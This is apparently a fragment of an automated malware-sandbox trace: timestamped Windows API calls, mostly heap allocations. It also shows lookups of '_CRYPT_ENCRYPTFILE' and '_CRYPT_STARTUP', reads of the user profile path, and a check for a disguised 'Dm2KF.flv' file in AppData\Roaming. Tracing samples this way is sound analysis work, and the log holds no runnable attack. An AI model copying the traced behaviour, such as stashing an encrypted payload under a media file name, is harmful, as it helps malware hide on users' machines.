RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0226.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0226.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dm2KF.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m2KF.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2KF.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0226.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KF.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0226.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0226.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0226.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0226.974] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0226.974] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0226.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0226.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0226.974] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0226.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0226.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0226.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0226.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0226.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0226.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0226.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0226.975] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0226.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0226.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0226.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0226.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0226.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0226.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0226.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0226.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0226.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0226.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0226.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0226.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0226.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0226.976] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50548 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0226.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0226.977] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0226.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0226.978] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0226.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0226.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0226.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0226.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0226.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0226.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0226.980] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0226.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.981] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0226.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0226.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0226.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0226.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0226.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0226.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0226.982] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0226.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0226.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0226.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0226.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0226.983] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Dm2KF.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x566a1a40, ftCreationTime.dwHighDateTime=0x1d5e384, ftLastAccessTime.dwLowDateTime=0xe8b26ce0, ftLastAccessTime.dwHighDateTime=0x1d5ec94, ftLastWriteTime.dwLowDateTime=0xe8b26ce0, ftLastWriteTime.dwHighDateTime=0x1d5ec94, nFileSizeHigh=0x0, nFileSizeLow=0x5116, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Dm2KF.flv", cAlternateFileName="")) returned 0xa87250 [0226.983] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0226.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.984] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0226.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0226.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0226.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0226.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0226.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0226.985] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0226.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0226.985] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0226.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0226.985] 